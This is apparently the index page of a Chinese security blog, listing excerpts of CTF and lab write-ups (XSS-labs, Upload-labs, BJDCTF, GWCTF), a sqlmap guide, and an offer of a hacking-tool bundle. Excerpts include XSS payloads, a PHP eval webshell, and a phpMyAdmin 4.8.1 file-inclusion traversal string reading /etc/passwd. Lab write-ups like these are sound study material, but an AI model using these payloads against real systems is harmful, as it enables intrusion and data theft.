置顶文章
精选分类
learn
CTF
文章列表
XSS-labs通关记录1-20
# linux 从根目录开始查找所有扩展名为.log的文本文件,并找出包含”leyangjun”的行:find / -type f | xargs grep "leyangjun" 当前目录开始查找所有扩展名为.php的文本文件,并找出包含”leyangjun”的行:find ./ -name "*.php" | xargs grep "leyangjun"
more...白嫖CTF工具箱2021-8-27
【重点声明】此系列仅用于工作和学习,禁止用于非法攻击,非法传播。一切遵守《网络安全法》 【重点声明】请各位在不清楚的情况下,不要对他人站点做尝试,实战需要请使用靶机,CTF,SRC。 工具分类齐全,集成了 cobalt stike,burp,sqlmap,earth worm,冰蝎,哥斯拉,蚁剑等等几乎涵盖了大部分的安全工具。总共资源 11G,整理于 2021.8.27。 点我查看工具详细清单 点我查看工具详细清单 点我查看工具详细清单 # 漏洞文库: # 资产发现: # 漏洞利用: # shell 管理: # 指纹识别 #...
more...burp抓app包详细步骤
# 前言 在渗透测试过程中,常常会遇到需要模拟微信客户端的网页,那么抓 app 包的技术就很重要了。写这篇文章的目的,是为了让更多的人不再踩我遇到的坑,让更多的人对网络安全感兴趣。 # 环境准备 雷电模拟器有时会出现白屏,无响应等情况。经过自己的尝试,发现夜神模拟器在抓包方面,表现的很出色。 burp 夜神模拟器 # 过程详述 # burp 监听 proxy-options ,burp 设置一下监听自己的内网 ip,端口设置为 8080 # 模拟器设置代理 在夜神模拟器,WiFi 设置里,修改网络设置,代理服务器为主机内网 ip ,端口是 8080 # 安装证书 访问 内网 ip: 端口...
more...Upload-labs通关记录1-20
# 第 1 关 通过流量信息发现,是前端验证,禁用 js ,成功上传 webshell # 第 2 关 通过抓包,发现修改 mime 类型为 image/png ,可绕过限制 # 第 3 关 黑名单限制,用 php3/4/5,phtml 均可绕过。 其中 phtml 的格式为 GIF89a? <script language="php">eval($_REQUEST[cmd])</script># 第 4 关 传入.htaccess 文件修改配置 SetHandler...
more...XSS-labs通关记录1-20
# 第一关 ?name=<script>alert(1)</script># 第二关 闭合前面的,就可以弹窗 ?keyword=test"><script>alert(1)</script>?keyword=test" onmouseover=alert(2) >click# 第三关 单引号,没有过滤,所以此处尝试 js 语句,' onmouseover=alert (2) 测试 'onmouseover=alert(2)...
more...BJDCTF2020 Mark loves cat
BJDCTF2020 Mark loves cat 本题考点: 代码审计 变量覆盖 扫描目录发现,存在 git 源码泄露。 下载出 index.php <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($_GET as $x...
more...BJDCTF2020 ZJCTF,不过如此
BJDCTF2020 ZJCTF,不过如此 本题考点: 文件包含 preg_replace () 的 RCE 伪协议 preg_replace () 使用的 /e 模式可以存在远程执行代码 # 解题过程 读取一下 next.php 的代码 d ?text=data://text/plain,I have a...
more...sqlmap使用心得
sqlmap 使用手册 tamper 常用脚本 最近刷 sqlilabs,借此机会,顺便学习了一下 sqlmap 的用法,并将使用心得记录一下 python sqlmap.py -u http://192.168.183.129:8082/Less-26/?id=1 -proxy=http://127.0.0.1:8080 --tamper doublewords.py,space2a0.py --prefix "'" --suffix "%a0or%a0(1)=%271" --dbms mysql --batch -v 0 --tech E...
more...BJDCTF2020 The mystery of ip
BJDCTF2020 The mystery of ip 本题考点: SSTI smarty 模板 # 过程 点击 flag 会显示自己的 ip,根据经验,这里可能是 ssti 模板注入。 修改请求头 Client-Ip 为 : 那么就可以命令执行了。
more...GWCTF2019 我有一个数据库
[GWCTF 2019] 我有一个数据库 本题考点: phpmyadmin 漏洞 # 过程 题目提示,我有一个数据库,那么猜测 目录 phpmyadmin,无密码直接登录 看到版本信息为 4.8.1 phpmyadmin4.8.0-4.8.1 存在文件包含漏洞 使用网上的 payload 直接打 ?target=db_datadict.php%253f/../../../../../../../../etc/passwd能够执行,修改为 flag,读取 flag ?target=db_datadict.php%253f/../../../../../../../../flag
more...